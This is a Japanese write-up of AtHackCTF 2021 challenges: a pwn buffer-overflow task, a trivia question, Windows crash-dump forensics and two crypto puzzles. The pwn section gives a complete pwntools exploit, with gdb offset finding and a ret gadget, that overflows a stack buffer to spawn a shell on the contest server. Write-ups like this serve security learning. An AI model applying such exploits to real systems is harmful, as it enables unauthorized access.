この大会は2021/11/20 21:00(JST)~2021/11/21 5:00(JST)に開催されました。
今回もチームで参戦。結果は408点で338チーム中44位でした。
自分で解けた問題をWriteupとして書いておきます。
PWN 1 (PWN 100)
mainをGhidraでデコンパイルする。
undefined8 main(void) { setvbuf(stderr,(char *)0x0,2,0); setvbuf(stdout,(char *)0x0,2,0); vuln(); return 0; } void vuln(void) { char local_12 [10]; fgets(local_12,0xaa,stdin); return; } void mysterious_function(void) { system("/bin/sh"); return; }
BOFでmysterious_function関数をコールする。
$ gdb -q ./main Reading symbols from ./main...(no debugging symbols found)...done. gdb-peda$ pattc 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /mnt/hgfs/Shared/main AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers----------------------------------] RAX: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...) RBX: 0x0 RCX: 0x1f RDX: 0x7ffff7dcf8d0 --> 0x0 RSI: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...) RDI: 0x7fffffffde47 ("AA%AAsAABAA$AAn"...) RBP: 0x41416e4141244141 (b'AA$AAnAA') RSP: 0x7fffffffde58 ("CAA-AA(AADAA;AA"...) RIP: 0x40066c (<vuln+34>: ret) R8 : 0x6022c5 --> 0x0 R9 : 0x7ffff7fda4c0 (0x00007ffff7fda4c0) R10: 0x602010 --> 0x0 R11: 0x246 R12: 0x400550 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf40 --> 0x1 R14: 0x0 R15: 0x0 [------------------------------------code-------------------------------------] Display various information of current execution context Usage: context [reg,code,stack,all] [code/stack length] 0x000000000040066c in vuln () gdb-peda$ patto CAA-AA(AADAA;AA CAA-AA(AADAA;AA found at offset: 18 $ ROPgadget --binary ./main | grep ": ret" 0x000000000040050e : ret
from pwn import * if len(sys.argv) == 1: p = remote('1-pwn.athack-ctf.com', 1337) else: p = process('./main') elf = ELF('./main') mysterious_function_addr = elf.symbols['mysterious_function'] ret_addr = 0x40050e offset = 18 print hex(mysterious_function_addr) payload = 'A' * offset payload += p64(ret_addr) payload += p64(mysterious_function_addr) print payload p.sendline(payload) p.interactive()
実行結果は以下の通り。
[+] Opening connection to 1-pwn.athack-ctf.com on port 1337: Done [*] '/mnt/hgfs/Shared/main' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 0x400637 AAAAAAAAAAAAAAAAAA\x0e@\x00\x00\x00\x06\x00\x00\x00 [*] Switching to interactive mode $ ls flag.txt main ynetd $ cat flag.txt AtHackCTF{9302575208025782507402580}
AtHackCTF{9302575208025782507402580}
X BoF (Trivia 100)
予期されるASCII文字の入力にUnicode文字を挿入したら、プログラムが失敗した。この場合に疑われるBoFの種類を答える。
AtHackCTF{Unicode BoF}
Debug (DFIR 100)
メモリダンプファイルが添付されていて、フラグフォーマットが"Flag Format: AtHackCTF{md5(FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID)}"となっている。
WinDbgで開き、!analyze -vをクリックする。
******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 80000003, Exception code that caused the bugcheck Arg2: 05080cb3, Address of the instruction which caused the bugcheck Arg3: 0632ed50, Address of the context record for the exception that caused the bugcheck Arg4: 00000000, zero. Debugging Details: ------------------ Unable to load image \??\C:\Windows\system32\drivers\myfault.sys, Win32 error 0n2 KEY_VALUES_STRING: 1 Key : Analysis.CPU.mSec Value: 765 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 1762 Key : Analysis.Init.CPU.mSec Value: 2749 Key : Analysis.Init.Elapsed.mSec Value: 35838 Key : Analysis.Memory.CommitPeak.Mb Value: 100 Key : WER.OS.Branch Value: win7sp1_rtm Key : WER.OS.Timestamp Value: 2010-11-19T18:50:00Z Key : WER.OS.Version Value: 7.1.7601.17514 VIRTUAL_MACHINE: VMware BUGCHECK_CODE: 3b★ BUGCHECK_P1: 80000003 BUGCHECK_P2: fffff88005080cb3 BUGCHECK_P3: fffff8800632ed50 BUGCHECK_P4: 0 CONTEXT: 0632ed50 -- (.cxr 0xfffff8800632ed50) eax=02ffba30 ebx=fffff880 ecx=fffffa80 edx=02ffba00 esi=0632fb60 edi=fffff880 eip=00000000 esp=00000000 ebp=fffffa80 iopl=0 nv up di pl nz na po nc cs=0000 ss=0018 ds=f730 es=0000 fs=0000 gs=f880 efl=00000000 00000000`00000000 ?? ??? Resetting default scope PROCESS_NAME: notmyfault64.exe IP_IN_FREE_BLOCK: 0 BAD_STACK_POINTER: 00000000 STACK_TEXT: 00000000 00000000 00000000 00000000 00000000 0x0 SYMBOL_NAME: myfault+1cb3 MODULE_NAME: myfault IMAGE_NAME: myfault.sys STACK_COMMAND: .thread ; .cxr ; kb FAILURE_BUCKET_ID: INVALID_KERNEL_CONTEXT_0x3B_80000003★ OS_VERSION: 7.1.7601.17514 BUILDLAB_STR: win7sp1_rtm OSPLATFORM_TYPE: x64 OSNAME: Windows 7 FAILURE_ID_HASH: {e531da8c-62d2-198a-1c77-b5a06a202afd}★ Followup: MachineOwner ---------
$ echo -n "e531da8c-62d2-198a-1c77-b5a06a202afd_3b_INVALID_KERNEL_CONTEXT_0x3B_80000003" | md5sum db5f4defc49e3a126bbe7d9a7ca548fa -
AtHackCTF{db5f4defc49e3a126bbe7d9a7ca548fa}
Fun Math (Crypto 100)
1文字ずつ暗号化しているので、ブルートフォースで復号する。
#!/usr/bin/env python3 def my_function(x): return pow(x,3)+10*pow(x,2)+x*7 + 6 cipher = [317336, 1696274, 425598, 1007448, 1069008, 1340288, 346128, 663858, 392496, 2013024, 734808, 1233758, 1268616, 1069008, 1233758, 948296, 142008, 1653936, 948296, 516368, 133974, 1612308, 1133024, 948296, 392496, 1739328, 1452776, 948296, 641264, 133974, 497274, 1783104, 1268616, 1452776, 1199544, 948296, 1531158, 133974, 1377114, 1918824, 1452776, 133974, 1414608, 1268616, 1007448, 1377114, 1653936, 948296, 556008, 619188, 948296, 1037924, 619188, 1739328, 1696274, 1133024, 392496, 133974, 1612308, 1069008, 1268616, 1452776, 1199544, 290184, 47064, 2110256] flag = '' for c in cipher: for code in range(32, 127): if my_function(code) == c: flag += chr(code) break print(flag)
AtHackCTF{Which_1s_M0re_Fun_S0Lving_p0lyn0mials_OR_bRuteF0rcing?!}
Complex (Crypto)
複素数の平方根を求める公式を使って、a, bを算出する。あとはinverseでxを算出し、フラグを構成していく。
#!/usr/bin/env python3 import gmpy2 from Crypto.Util.number import * c = 6983291701597905 d = 5336385994037448 parts = [380932079629368, 191767163205492, 391844072538906, 242715789325632, 636916609920084, 101350594515744, 701115392013585, 136776893476692, 666218469621657, 205565478406008, 588555394058607, 3755755500] p = 14088005995134184327 K2 = c ** 2 + d ** 2 K = gmpy2.iroot(K2, 2)[0] assert K**2 == K2 a2 = (c + K) // 2 a = gmpy2.iroot(a2, 2)[0] assert a**2 == a2 b2 = (- c + K) // 2 b = gmpy2.iroot(b2, 2)[0] assert b**2 == b2 flag = b'' for i in range(len(parts)): if i % 2 == 0: x = (parts[i] * inverse(a, p)) % p else: x = (parts[i] * inverse(b, p)) % p flag += long_to_bytes(x) flag = flag.decode() print(flag)
AtHackCTF{C0mpl3xxxx_Ev3ryWheRe!!}